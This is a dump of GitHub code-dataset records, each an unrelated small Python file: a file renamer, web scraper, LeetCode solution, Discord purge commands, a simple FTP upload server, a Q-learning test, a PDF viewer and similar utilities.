datetime\n\nprint(\"********************************************\")\nprint(\"************Bulk File Renaming**************\")\nprint(\"\\n\\n\\n\")\n\nCon=\"Y\"\nwhile Con.upper()==\"Y\":\n FPath=input(\"Folder Path: \")\n while not path.exists(str(FPath)):\n FPath=input(\"Folder Path: \")\n c=1\n for f1 in os.listdir(str(FPath)):\n print(str(c) + \" : \"+ str(FPath)+\"/\"+str(f1))\n Date=str(datetime.date(datetime.now()))\n Date=Date.replace(\"-\",\"\")\n Time=str(datetime.time(datetime.now()))\n Time=Time.replace(\":\",\"\")\n Time,E1,E2=Time.partition('.')\n Name,Dot,Format=f1.partition('.')\n Appending=\"_ENT_MCT_MCO_002_\"+Date+\"_\"+Time+\".\"+str(Format)\n os.rename(str(FPath)+\"/\"+str(f1),str(FPath)+\"/\"+str(Name)+Appending)\n c+=1\n Con=input(\"Do You Wish To Continue? (Y/N): \")\n\n\n\n","repo_name":"drahdari/Others","sub_path":"More Simple Scripts/Bulk_Templated_FileRename.py","file_name":"Bulk_Templated_FileRename.py","file_ext":"py","file_size_in_byte":909,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"74914974201","text":"import mimetypes\nimport random\nimport string\n\nfrom vial.compat import bstr\n\n_BOUNDARY_CHARS = string.digits + string.ascii_letters\n\n\ndef encode_multipart(fields, files, boundary=None):\n r\"\"\"Encode dict of form fields and dict of files as multipart/form-data.\n Return tuple of (body_string, headers_dict). Each value in files is a dict\n with required keys 'filename' and 'content', and optional 'mimetype' (if\n not specified, tries to guess mime type or uses 'application/octet-stream').\n\n >>> body, headers = encode_multipart({'FIELD': 'VALUE'},\n ... {'FILE': {'filename': 'F.TXT', 'content': 'CONTENT'}},\n ... boundary='BOUNDARY')\n >>> print('\\n'.join(repr(l) for l in body.split('\\r\\n')))\n '--BOUNDARY'\n 'Content-Disposition: form-data; name=\"FIELD\"'\n ''\n 'VALUE'\n '--BOUNDARY'\n 'Content-Disposition: form-data; name=\"FILE\"; filename=\"F.TXT\"'\n 'Content-Type: text/plain'\n ''\n 'CONTENT'\n '--BOUNDARY--'\n ''\n >>> print(sorted(headers.items()))\n [('Content-Length', '193'), ('Content-Type', 'multipart/form-data; boundary=BOUNDARY')]\n >>> len(body)\n 193\n \"\"\"\n def escape_quote(s):\n return bstr(s).replace(b'\"', b'\\\\\"')\n\n if boundary is None:\n boundary = ''.join(random.choice(_BOUNDARY_CHARS) for i in range(30)).encode('latin1')\n lines = []\n\n for name, value in fields:\n lines.extend((\n b'--%s' % boundary,\n b'Content-Disposition: form-data; name=\"%s\"' % escape_quote(name),\n b'',\n bstr(value, 'utf-8'),\n ))\n\n for name, value in files:\n filename = value['filename']\n if 'mimetype' in value:\n mimetype = value['mimetype']\n else:\n mimetype = mimetypes.guess_type(filename)[0] or 'application/octet-stream'\n lines.extend((\n b'--%s' % boundary,\n b'Content-Disposition: form-data; name=\"%s\"; filename=\"%s\"' % (\n escape_quote(name), escape_quote(filename)),\n b'Content-Type: %s' % (bstr(mimetype)),\n b'',\n value['content'],\n ))\n\n lines.extend((\n b'--%s--' % boundary,\n b'',\n ))\n body = b'\\r\\n'.join(lines)\n\n headers = {\n b'Content-Type': b'multipart/form-data; boundary=%s' % boundary,\n b'Content-Length': bstr(str(len(body))),\n }\n\n return (body, headers)\n","repo_name":"baverman/vial-http","sub_path":"vial-plugin/vial_http/multipart.py","file_name":"multipart.py","file_ext":"py","file_size_in_byte":2452,"program_lang":"python","lang":"en","doc_type":"code","stars":412,"dataset":"github-code","pt":"40"} +{"seq_id":"43771866536","text":"import requests\nfrom bs4 import BeautifulSoup\nimport pandas as pd\nimport xlsxwriter\n\nsirealNumber=[]\nmovieName=[]\nmovieYear=[]\nmovieGenre=[]\nmovieRating=[]\n\nURL=\"https://www.imdb.com/list/ls041322734/\"\nr = requests.get(URL)\nsoup = BeautifulSoup(r.content, 'html5lib')\n# print(soup.prettify())\n\ntable = soup.find('div', attrs = {'class':'lister list detail sub-list'})\n\nfor sno in table.findAll('span', attrs={'class':'lister-item-index unbold text-primary'}):\n sirealNumber.append(sno.text.strip(\".\"))\n # print(sno.text.strip(\".\"))\n\nfor mName in table.findAll('h3', attrs={'class':'lister-item-header'}):\n for movieNames in mName.findAll('a'):\n movieName.append(movieNames.text)\n\nfor years in table.findAll('span',attrs={'class':'lister-item-year text-muted unbold'}):\n movieYear.append(years.text.strip(\"()\"))\n\nfor genres in table.findAll('span', attrs={'class':'genre'}):\n movieGenre.append(genres.text)\n\nfor ratingsTab in table.findAll('div',attrs={'class':'ipl-rating-star small'}):\n for ratings in ratingsTab.findAll('span', attrs={'class':'ipl-rating-star__rating'}):\n movieRating.append(ratings.text)\n\n\n\ndat1 = pd.DataFrame(sirealNumber)\ndat1.columns = ['Serial Number']\nresult1A = dat1\n\ndat2 = pd.DataFrame(result1A)\ndat3 = pd.DataFrame(movieName)\ndat3.columns = ['Movie Name']\nresult2A = dat2.join(dat3)\n\ndat4 = pd.DataFrame(result2A)\ndat5 = pd.DataFrame(movieYear)\ndat5.columns = ['Movie Year']\nresult3A = dat4.join(dat5)\n\ndat6 = pd.DataFrame(result3A)\ndat7 = pd.DataFrame(movieGenre)\ndat7.columns = ['Movie Genre']\nresult4A = dat6.join(dat7)\n\ndat8 = pd.DataFrame(result4A)\ndat9 = pd.DataFrame(movieRating)\ndat9.columns = ['Movie Rating']\nresult4A = dat8.join(dat9)\n\n\ndf1 = pd.DataFrame(result4A)\nwriter = pd.ExcelWriter('result.xlsx', engine='xlsxwriter')\ndf1.to_excel(writer, sheet_name='Sheet1')\nworksheet = writer.sheets['Sheet1']\nwriter.save()","repo_name":"AvishekSahu24/BeautifulSoup_IMDB_Top_Movies_List_In_Excel_Output","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1890,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"41698707746","text":"# https://leetcode.com/problems/maximum-subarray/\n\nclass Solution:\n def maxSubArray(self, nums) -> int:\n sum_max = nums[0]\n sum_cur = 0\n for i in range(len(nums)):\n sum_cur = nums[i] + sum_cur * int((sum_cur + nums[i]) > nums[i])\n if sum_cur > sum_max:\n sum_max = sum_cur\n return sum_max\n \ns = Solution()\nprint(s.maxSubArray([-2,1,-3,4,-1,2,1,-5,4]))\n\n ","repo_name":"dkuzyurin/leetcode","sub_path":"0053-maximum-subarray.py","file_name":"0053-maximum-subarray.py","file_ext":"py","file_size_in_byte":431,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"70974134199","text":"from unit import *\nfrom controllable import *\nfrom constant import *\nfrom cursor import *\n\n#\n# Enemy\n#\n# Any unit controlled by the enemy\n# All must be killed to win\n#\n\nclass Enemy (Unit):\n\n def __init__ (self,name):\n\n Unit.__init__(self,name)\n log(\"Enemy.__init__ for \"+str(self))\n \n Character.enemies.append(self)\n\n #Setup Switching\n self._next = Character.enemies[0]\n self._previous = Character.enemies[0] if len(Character.enemies) < 2 else Character.enemies[-2]\n self._next._previous = self\n self._previous._next = self\n\n def is_enemy (self):\n return True\n\n def move (self,dx,dy):\n return Unit.move(self,dx,dy)\n\n def end_turn (self):\n #Ending Turn\n self.set_unavailable()\n log(\"ended turn for \"+str(self))\n \n #If no units can move, end the Enemy's turn\n remaining = [enemy for enemy in Character.enemies if enemy.is_available()]\n if remaining == []:\n Controllable.player = True\n log(\"All enemies have ended turn. Switching to player turn.\")\n for friendly in Character.friendlies:\n friendly.set_available()\n unit = Character.friendlies[0]\n Controllable.current.switch(unit)\n Cursor.cursor.appear(unit.x(),unit.y())\n Cursor.cursor.reset_summons()\n Controllable.current.switch(Cursor.cursor)\n announce(self._screen._window,\"PLAYER TURN\")\n\n for enemy in Character.enemies:\n #This is necessary so that the Player can select the enemies on the Player's turn\n enemy.set_available()\n\n def die (self,killer):\n Unit.die(self,killer)\n Character.enemies.remove(self)\n\n #End The Game\n if Character.enemies == []:\n self.update_panel()\n log(\"All enemies have died. Player has won. Game will now end.\")\n win(self._screen._window)\n\n #End The Turn\n if self.is_current():\n self.end_turn()\n","repo_name":"Zhomans/spookyquest","sub_path":"enemy.py","file_name":"enemy.py","file_ext":"py","file_size_in_byte":2056,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"6303870595","text":"import csv\n\nstates = ['a', 'b', 'c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z','1','2','3','4','5','6','7','8','9','0']\nn = 4\nfilename = 'listofwords.csv'\n\ndef increment(arr):\n last = n - 1\n cut_off = len(states) - 1\n\n arr[last] += 1\n\n for i in range(last, 0, -1):\n if arr[i] > cut_off:\n arr[i] = 0\n arr[i - 1] += 1\n else:\n break\n return arr\n\n\ndef permutations(states, n):\n if len(states) <= 1: return\n if n == 0: return\n\n current = [0] * n\n\n out = []\n count = 0\n\n possibilities = len(states) ** n\n\n while count < possibilities:\n new_permutation = []\n\n for i in range(0, n):\n j = current[i]\n new_permutation += [states[j]]\n out += [new_permutation]\n\n count += 1\n current = increment(current)\n\n return out\n\ndef write_file(filename,permutations):\n listFile = open(filename, 'w+')\n writer = csv.writer(listFile)\n\n for item in permutations:\n word = ''.join(item)\n writer.writerow([word])\n\nprint(permutations(states, n))\n\ndef main():\n words = permutations(states, n)\n write_file(filename,words)\n\n\nif __name__ == '__main__':\n main()","repo_name":"willsjacobsen/Random-String-Generator","sub_path":"generator.py","file_name":"generator.py","file_ext":"py","file_size_in_byte":1250,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"30746652440","text":"#!/usr/bin/python\n# -*- coding: UTF-8 -*-\nimport os\nimport sys\n\nfrom threading import Thread\n\nsys.path.append('..')\nfrom bin.loggerPro import LoggerPro, logger\n\n'''\n@author: anke\n@contact: anke.wang@foxmail.com\n@file: cmdThread.py\n@time: 2020/4/25 11:25 AM\n\n@desc: 为任务创建线程\n'''\n\n\nclass CmdThread(Thread):\n def __init__(self, id, cmd):\n Thread.__init__(self)\n self.id = id\n self.cmd = cmd\n self.isSuccess = False\n\n def run(self):\n isComeon = True\n if isComeon:\n status = 0\n result = '假装我就是执行结果'\n # status, result = subprocess.getstatusoutput(self.cmd)\n if status == 0:\n logger.info('[****命令【%s】执行成功,退出进程!****]' % self.cmd)\n logger.info('[EXCUTE_DONE]%s' % self.cmd)\n logger.info('[****执行结果【%s】****]' % result)\n self.isSuccess = True\n else:\n logger.error('[****命令【%s】执行失败! status=【%d】 result=【%s】进程退出!****]'\n % (self.cmd, status, result))\n logger.error('[EXCUTE_DONE]%s' % self.cmd)\n\n\nif __name__ == '__main__':\n LoggerPro().config()\n cm = CmdThread(1, \"pwd\", )\n cm.run()\n","repo_name":"anke5156/hipDataLoad","sub_path":"bin/cmdThread.py","file_name":"cmdThread.py","file_ext":"py","file_size_in_byte":1321,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"103514751","text":"import sys\nsys.path.append(\"../..\")\nimport glob\nimport os.path\nimport smd.utils as utils\nimport numpy as np\n\nNOISE_PATH = \"/Users/quentin/Computer/DataSet/Music/speech_music_detection/esc-50/audio\"\nFILELISTS_PATH = \"/Users/quentin/Computer/DataSet/Music/speech_music_detection/esc-50/filelists\"\n\n\ndef load_files():\n noise_files = glob.glob(NOISE_PATH + \"/*.wav\")\n return noise_files\n\n\nif __name__ == \"__main__\":\n noise_files = load_files()\n\n print(\"Number of noise files: \" + str(len(noise_files)))\n\n for file in noise_files:\n utils.save_annotation([[\"noise\"]], os.path.basename(file).replace(\".wav\", \"\") + \".txt\", NOISE_PATH)\n\n noise_train = np.random.choice(noise_files, size=int(len(noise_files) * 0.8), replace=False)\n\n for file in noise_files:\n if file in noise_train:\n with open(os.path.join(FILELISTS_PATH, 'noise_train'), 'a') as f:\n f.write(os.path.basename(file) + '\\n')\n else:\n with open(os.path.join(FILELISTS_PATH, 'noise_val'), 'a') as f:\n f.write(os.path.basename(file) + '\\n')\n","repo_name":"qlemaire22/speech-music-detection","sub_path":"prepare_dataset/extract_annotations/esc-50.py","file_name":"esc-50.py","file_ext":"py","file_size_in_byte":1087,"program_lang":"python","lang":"en","doc_type":"code","stars":85,"dataset":"github-code","pt":"40"} +{"seq_id":"21254032489","text":"\r\n# =============================================================================\r\n# Programm taking the retrieved row data and cleaning it in defined columns\r\n# =============================================================================\r\n\r\n# Used Libraries\r\n\r\nimport pandas as pd\r\nimport time\r\nimport os\r\n\r\n\r\n# Function that takes a Dataset as input and cleans it into defined columns\r\n\r\ndef DataCleaning(DataFile):\r\n \r\n # Holding count of number of errors\r\n \r\n Errors = 0\r\n \r\n \r\n # Creating an empty dataframe to input the cleaned data\r\n \r\n Labels = {'ID':[], 'Brand':[], 'Model':[], 'Price':[], 'Km':[], 'Engine':[], 'Age':[], 'Color':[], 'NIP':[], 'Date':[]}\r\n\r\n CleanData = pd.DataFrame(data = Labels)\r\n \r\n \r\n # Holding track of time\r\n \r\n ts1 = time.perf_counter()\r\n\r\n\r\n # Looping for every vehicule\r\n\r\n for i in range(len(DataFile)):\r\n \r\n \r\n # Holding track of time\r\n \r\n ts2 = time.perf_counter()\r\n \r\n \r\n # Progress information printed on the console\r\n \r\n if i % int(ChunkSize/10) == 0 and i != 0:\r\n \r\n print(f'{i}: {round(i/len(DataFile)*100)}% in {round(ts2-ts1,2)} seconds')\r\n \r\n if i == len(DataFile)-1:\r\n \r\n print(f'{i + 1}: 100% in {round(ts2-ts1,3)} seconds \\n')\r\n \r\n \r\n # Selecting the vehicule's id and sending it to the final Dataframe\r\n \r\n CleanData.loc[i, 'ID'] = str((DataFile.iloc[i, 0]))\r\n \r\n \r\n # Slicing the HTML title into separate words\r\n \r\n TempTitle = DataFile.iloc[i,1]\r\n \r\n TempTitle = TempTitle.split(' ')\r\n \r\n \r\n # try to fetch the price\r\n \r\n try:\r\n \r\n # Looking for keywords in the title\r\n \r\n for j in range(len(TempTitle)):\r\n \r\n # The keyword 'kaufen.' if our keyword. the model's name ended\r\n # 4 words prior.\r\n \r\n if TempTitle[j] == 'kaufen.':\r\n \r\n # For Model\r\n TempModel = TempTitle[:j-4]\r\n \r\n # The Value before 'Anfrage' no Price is available\r\n \r\n if TempTitle[j-1] == 'Anfrage':\r\n \r\n CleanData.loc[i, 'Price'] = None\r\n \r\n # else, the price is in position keyword-2, we directly\r\n # clean the Price of any unwanted symbols\r\n \r\n else:\r\n \r\n CleanData.loc[i, 'Price'] = int(TempTitle[j-2].replace(\"'\", \"\").replace(\".\", \"\").replace(\"-\", \"\"))\r\n \r\n # if an error was raised, set the price to None to avoid an error\r\n \r\n except: \r\n \r\n CleanData.loc[i, 'Price'] = None\r\n \r\n \r\n # Next we join the brand and model of the vehicule together\r\n \r\n try:\r\n \r\n CleanData.loc[i, 'Brand'] = TempModel[0]\r\n \r\n CleanData.loc[i, 'Model'] = '_'.join(TempModel[1:])\r\n \r\n # again accounting for missing data\r\n \r\n except:\r\n \r\n CleanData.loc[i, 'Brand'] = None\r\n \r\n CleanData.loc[i, 'Model'] = None\r\n \r\n \r\n # The Km usually comes retrieved at a specific place and can be taken\r\n # as is\r\n \r\n try:\r\n \r\n CleanData.loc[i, 'Km'] = DataFile.iloc[i, 4].replace(\"'\", \"\")\r\n \r\n except:\r\n \r\n CleanData.loc[i, 'Km'] = None\r\n \r\n \r\n # fetching the date of publication while accounting for a possible shift\r\n # in columns depending the the amount of values that we managed to retrieve\r\n \r\n try:\r\n \r\n if DataFile.iloc[i,6] != 'error':\r\n \r\n CleanData.loc[i, 'Date'] = DataFile.iloc[i,6]\r\n \r\n else:\r\n \r\n if len(DataFile.iloc[i,7]) == 10:\r\n \r\n CleanData.loc[i, 'Date'] = DataFile.iloc[i,7]\r\n \r\n # again accounting for missing data\r\n \r\n except:\r\n \r\n CleanData.loc[i, 'Date'] = None\r\n \r\n \r\n # Fetching the initial entry into service date, same as above\r\n \r\n try:\r\n \r\n if len(DataFile.iloc[i,5]) == 7:\r\n \r\n CleanData.loc[i, 'Age'] = DataFile.iloc[i,5]\r\n \r\n else:\r\n \r\n CleanData.loc[i, 'Age'] = CleanData.loc[i, 'Date'][3:]\r\n \r\n except:\r\n \r\n CleanData.loc[i, 'Age'] = None\r\n \r\n\r\n # Other usefull data such as the color and the engine specifics\r\n \r\n try:\r\n \r\n # taking the description and dividing it into words\r\n \r\n TempDescr = DataFile.iloc[i,2]\r\n \r\n TempDescr = TempDescr.split(' 101101\n# - 3 -> 11\n# - 2 -> 10\n\nimport math\n\ndef to_binary(num):\n binary = ''\n while num != 0:\n binary += str(num % 2)\n num = math.floor(num/2)\n return \"\".join(reversed(binary))\n\nnumber = int(input('Введите число: '))\nbin_number = to_binary(number)\nprint(bin_number)\n","repo_name":"MikeGoroshkov/python-hw3","sub_path":"task4.py","file_name":"task4.py","file_ext":"py","file_size_in_byte":478,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"72052987959","text":"from uteis import menuPrin\nfrom cadastros.cadcli import CadClientes\nfrom cadastros.cadpro import CadProdutos\nfrom cadastros.cadcont import CadContas\nfrom vendas.venda import Vendas\n\n\nwhile True:\n try:\n print('{:=^40}'.format(' MENU PRINCIPAL '))\n menuPrin()\n op = int(input('Selecione uma opção: '))\n except KeyboardInterrupt:\n continue\n except (ValueError, TypeError):\n print('Tipo de dado incorreto, por favor selecione uma opção do menu.')\n continue\n except Exception as erro:\n print(f'Ocorreu um erro ao selecionar a opção, por favor tente novamente.')\n continue\n if op == 1:\n cadcli = CadClientes()\n cadcli.cad_clientes()\n elif op == 2:\n cadpro = CadProdutos()\n cadpro.cad_produtos()\n elif op == 3:\n cadcont = CadContas()\n cadcont.cad_contas()\n elif op == 4:\n ven = Vendas()\n ven.venda()\n elif op == 5:\n break\n else:\n print('Opção inválida, por favor selecione uma opção do menu.')\n continue\n","repo_name":"edson-cpp/cadNX","sub_path":"menu.py","file_name":"menu.py","file_ext":"py","file_size_in_byte":1071,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"29483716267","text":"import discord\nfrom discord.ext import commands\nimport re\n\nclass purgestuff(commands.Cog):\n def __init__(self,bot):\n self.bot = bot\n\n @commands.group()\n @commands.has_permissions(manage_messages=True)\n async def purge(self,ctx):\n if ctx.invoked_subcommand is None:\n embed = discord.Embed(title=\"Purge Command Syntax\", description=\"\"\"\n **Description:** The purge command deletes a number of messages in a channel\n **Uses:**\n -__purge count (count)__ --Deletes the specified number of messages\n -__purge bots (count)__ --Deletes messages by bots\n -__purge humans (count)__ --Deletes messages by non-bots\n -__purge links (count)__ --Deletes messages with http:// or https://\n -__purge invites (count)__ --Deletes messages with invites\n -__purge user (@user) (count)__ --Deletes messages made by that user\n -__purge match (count) [match_phrase]__ --Deletes all messages with match_phrase in them\n \"\"\")\n return await ctx.send(embed=embed)\n\n @purge.command()\n async def count(self, ctx, count:int):\n num = await ctx.channel.purge(limit=count)\n return await ctx.send(f\"Purged {len(num)} messages\")\n\n @purge.command()\n async def bots(self, ctx, count:int):\n check = lambda m: m.author.bot\n return await ctx.channel.purge(limit=count, check=check)\n\n @purge.command()\n async def humans(self, ctx, count:int):\n check = lambda m: not m.author.bot\n return await ctx.channel.purge(limit=count, check=check)\n\n @purge.command()\n async def user(self, ctx, user:discord.User, count:int):\n check = lambda m: m.author == user\n return await ctx.channel.purge(limit=count, check=check)\n @purge.command()\n async def match(self, ctx, count:int, *, match_phrase:str):\n check = lambda m: match_phrase.lower() in m.content.lower()\n return await ctx.channel.purge(limit=count, check=check)\n\n @purge.command()\n async def links(self, ctx, count:int):\n check = lambda m: \"https://\" in m.content.lower() or \"http://\" in m.content.lower()\n return await ctx.channel.purge(limit=count, check=check)\n\n @purge.command()\n async def invites(self,ctx,count:int):\n DISCORD_INVITE = r'discord(?:\\.com|app\\.com|\\.gg)[\\/invite\\/]?(?:[a-zA-Z0-9\\-]{2,32})'\n def get_invites(message):\n regex = re.compile(DISCORD_INVITE)\n invites = regex.findall(message)\n return invites or []\n check = lambda m: True if len(get_invites(m.content)) != 0 else False\n await ctx.channel.purge(limit=count, check=check)\n\n\n\ndef setup(bot):\n bot.add_cog(purgestuff(bot))\n","repo_name":"rij1234/dpy-public-cogs","sub_path":"complex_purge.py","file_name":"complex_purge.py","file_ext":"py","file_size_in_byte":2701,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"40"} +{"seq_id":"14435073630","text":"'''\ntesting hysteretic_q learning on the penalty game.\n'''\n\nfrom matplotlib import pyplot as plt\nimport numpy as np\n\nfrom environments.env_penalty import Penalty\nfrom learning_algorithms.hysteretic_q_matrix import HystereticAgentMatrix\n\nepisodes = 1\nepochs = 300\nexp_rate = 0.01\nexp_rate_decay = 0.999\n\ndef run_episode():\n env = Penalty()\n learning = HystereticAgentMatrix(environment=env, exploration_rate=exp_rate)\n\n for i in range(epochs):\n learning.step()\n\n reward_1, reward_2 = learning.get_rewards()\n\n \"\"\"\n plt.plot(reward_1)\n plt.show()\n \"\"\"\n rewards_1, rewards_2 = learning.get_averaged_rewards()\n rewards_1 = np.asarray(rewards_1)\n rewards_2 = np.asarray(rewards_2)\n\n \"\"\"\n plt.plot(rewards_1)\n plt.title(\"Penalty Game, K = -3\")\n plt.xlabel(\"steps\")\n plt.ylabel(\"average_reward\")\n plt.show()\n \"\"\"\n return rewards_1\n\nif __name__ == \"__main__\":\n overall = np.zeros(shape=(epochs - 1,))\n for episode in range(episodes):\n overall += run_episode()\n print(\"Episode \", episode)\n #exp_rate = exp_rate * exp_rate_decay\n #print(exp_rate)\n\n plt.plot(overall / episodes)\n plt.xlabel(\"Epochs\")\n plt.ylabel(\"Averaged Rewards (Averaged over all episodes)\")\n plt.show()\n\n","repo_name":"swj0418/Reinforcement_Learning_Framework","sub_path":"tests/test_hysteretic_q_penalty.py","file_name":"test_hysteretic_q_penalty.py","file_ext":"py","file_size_in_byte":1273,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"11759758183","text":"#!/usr/bin/env python\n# _*_ coding: utf-8 _*_\n\n# import socketserver\n#\n# class my_tcp_handler(socketserver.BaseRequestHandler):\n# def setup(self):\n# pass # 连接之前做一些操作\n#\n# def handle(self):\n# # conn,addr = server.accept()\n# # self.request,self.client_address = server.accept()\n# # 所有客户端交互都在该方法中进行处理 server --> bind --> listen --> accept都已经封装过了,直接处理后续的操作\n# print(self.client_address)\n# while True:\n# self.data = self.request.recv(1024)\n# print(self.data.decode())\n# self.request.send(self.data.upper())\n#\n# def finish(self):\n# pass #连接之后做一些操作\n#\n#\n# server = socketserver.ThreadingTCPServer(('localhost',9999),my_tcp_handler)\n# server.serve_forever()\n\n# import os\n# import SocketServer\n#\n# class my_server(SocketServer.BaseRequestHandler):\n#\n# def handle(self):\n# base_path = r'W:\\iso'\n# conn = self.request\n# print('connected... for ',self.client_address)\n#\n# while True:\n# pre_data = conn.recv(1024)\n# cmd,file_name,file_size = pre_data.split(\"|\")\n# recv_size = 0\n# file_dir = os.path.join(base_path,file_name.decode())\n# f = open(file_dir,'wb')\n# Flag = True\n# while Flag:\n# if int(file_size.decode()) > recv_size:\n# data = conn.recv(1024)\n# recv_size+=len(data)\n# else:\n# recv_size = 0\n# Flag = False\n# continue\n# f.write(data)\n# print('upload successed.file',file_name)\n# f.close()\n#\n# server = SocketServer.ThreadingTCPServer(('localhost',9999),my_server)\n# server.serve_forever()\n\n\nimport os\nimport json\n\nimport socketserver\n\nclass my_ftp(socketserver.BaseRequestHandler):\n\n def put(self,*args):\n cmd_dic = args[0]\n filename = cmd_dic[\"filename\"]\n filesize = cmd_dic[\"filesize\"]\n f = open(filename + '.new','wb') if os.path.isfile(filename) else open(filename,'wb')\n\n self.request.send(b'200 ok')\n received_size = 0\n while received_size < filesize:\n data = self.request.recv(1024)\n f.write(data)\n received_size += len(data)\n else:\n print(\"file [%s] has uploaded ...\" % filename)\n\n def handle(self):\n while True:\n try:\n self.data = self.request.recv(1024).strip()\n print(\"client socket\",self.client_address)\n print(\"receive data format\",self.data)\n cmd_dic = json.loads(self.data.decode())\n action = cmd_dic['action']\n if hasattr(self,action):\n func = getattr(self,action)\n func(cmd_dic)\n except ConnectionRefusedError as e:\n print('err',e)\n break\n\nserver = socketserver.ThreadingTCPServer(('localhost',9999),my_ftp)\nserver.serve_forever()\n\n\n","repo_name":"wangchunxiang8090/exercise","sub_path":"test/log/ftp_server.py","file_name":"ftp_server.py","file_ext":"py","file_size_in_byte":3140,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"14032455860","text":"'''\n\n 1554. Strings Differ by One Character\n \n'''\n\nclass SolutionRef:\n def differByOne(self, dict):\n n, m = len(dict), len(dict[0])\n hashes = [0] * n\n MOD = 10 ** 11 + 7\n \n for i in range(n):\n for j in range(m):\n char = dict[i][j]\n hashes[i] = 26 * hashes[i] + self.code(char)\n print(hashes)\n \n base = 1\n for j in range(m - 1, -1, -1):\n seen = set()\n for i in range(n):\n char = dict[i][j]\n newH = (hashes[i] - base * self.code(char))\n \n if newH in seen: return True \n seen.add(newH) \n \n base = 26 * base\n \n def code(self, char):\n return ord(char) - ord('a')\n \n \nclass Solution:\n def differByOne(self, dict):\n wordLen, charLen = len(dict), len(dict[0])\n hashes = [0] * wordLen\n \n for i in range(wordLen):\n for j in range(charLen):\n char = dict[i][j]\n hashes[i] = (26 * hashes[i]) + self.code(char)\n \n base = 1\n for j in range(charLen - 1, -1, -1):\n seen = set()\n \n for i in range(wordLen):\n char = dict[i][j]\n newH = hashes[i] - (base * self.code(char))\n \n if newH in seen: return True\n seen.add(newH)\n \n base *= 26\n \n return False\n \n def code(self, char):\n return ord(char) - ord('a')\n \n \n \n \ndef runSolution():\n solution = Solution()\n print(solution.differByOne(dict = [\"abcd\",\"acbd\", \"aacd\"]))\n print(solution.differByOne(dict = [\"ab\",\"cd\",\"yz\"]))\n print(solution.differByOne(dict = [\"abcd\",\"cccc\",\"abyd\",\"abab\"]))\n pass\nrunSolution()\n","repo_name":"AlexanderDLe/Python_DataStructuresAndAlgorithms","sub_path":"Strings/StringsDifferByOneCharacter.py","file_name":"StringsDifferByOneCharacter.py","file_ext":"py","file_size_in_byte":1607,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"14349526253","text":"from tkinter import *\r\nfrom tkinter import filedialog\r\nfrom PIL import Image, ImageTk\r\nfrom pdf2image import convert_from_path\r\nfrom tkPDFViewer import tkPDFViewer as pdf\r\nimport os\r\n\r\n\r\n# Creating Tk container\r\nroot = Tk()\r\n\r\nroot.geometry(\"800x800\")\r\nroot.title('Pdf Viewer')\r\nroot.configure(bg=\"white\")\r\n\r\n\r\ndef browseFiles():\r\n filename = filedialog.askopenfilename(initialdir = os.getcwd(),\r\n title = 'select pdf file',\r\n filetype = (('PDF FILE','.pdf'),\r\n ('PDF FILE','.PDF'),\r\n ('ALL FILE','.txt')\r\n ))\r\n pdf_frame = Frame(root).pack(fill=BOTH, expand=1)\r\n # Adding Scrollbar to the PDF frame\r\n scrol_y = Scrollbar(pdf_frame, orient=VERTICAL)\r\n # Adding text widget for inserting images\r\n pdf = Text(pdf_frame, yscrollcommand=scrol_y.set, bg=\"white\")\r\n # Setting the scrollbar to the right side\r\n scrol_y.pack(side=RIGHT, fill=Y)\r\n scrol_y.config(command=pdf.yview)\r\n # Finally packing the text widget\r\n pdf.pack(fill=BOTH, expand=1)\r\n # Here the PDF is converted to list of images\r\n pages = convert_from_path(filename, size=(800, 900))\r\n imglist = []\r\n for i, image in enumerate(pages):\r\n fname = 'C:/Users/Asus/Desktop/images/page' + str(i) + \".png\"\r\n image.save(fname, \"PNG\")\r\n imglist.append(image)\r\n pages = imglist\r\n # Empty list for storing images\r\n photos = []\r\n # Storing the converted images into list\r\n for i in range(len(pages)):\r\n photos.append(ImageTk.PhotoImage(pages[i]))\r\n # Adding all the images to the text widget\r\n for photo in photos:\r\n pdf.image_create(END, image=photo)\r\n\r\n # For Seperating the pages\r\n pdf.insert(END, '\\n\\n')\r\n mainloop()\r\n\r\nButton(root, text='open', command=browseFiles, width=20, font=\"arial 20\", bd=4).pack()\r\n\r\n\r\nroot.mainloop()","repo_name":"raneemammaralshamy/File-Editor","sub_path":"gui.py","file_name":"gui.py","file_ext":"py","file_size_in_byte":2039,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"74868133239","text":"#Declarar variables vacios\nvalor=None #Ausencia de valor\n\n#Condiciones\ncondicion=True\nif(condicion):\n print('VErdadero')\nelif(condicion>1):\n print('ElseIF')\nelse:\n print('Else')\n\n#If Ternario\nvalor='Azul' if condicion==False else 'Rojo'\n# Resultado valorAfirmativo condicion Valor Negativo\n#Operadores logicos or,and,not \n\n#Bucles Repetitivos\ni=0\nwhile(i<10):\n print('w:',i)\n i+=1\nelse:\n print('Fin de ciclo While')\n#For, para cualquier tipo iterable, lista, tupla, diccionario, cadena\nfor i in range(0,10):\n print('f:',i) \n\n#range(11) <--> range(0,11), va desde 0 a < 11, range(valorInicial,valorFinal, Step)\nnum=[2,4,5,6,9]\n#funcion enumerate(lista, tupla, o diccionario)\nfor indice,numero in enumerate(num):\n print(indice,numero)\n\n#Romper o cuntinuar los bucles, brake o continue\nfor caracter in \"Este es un texto\":\n 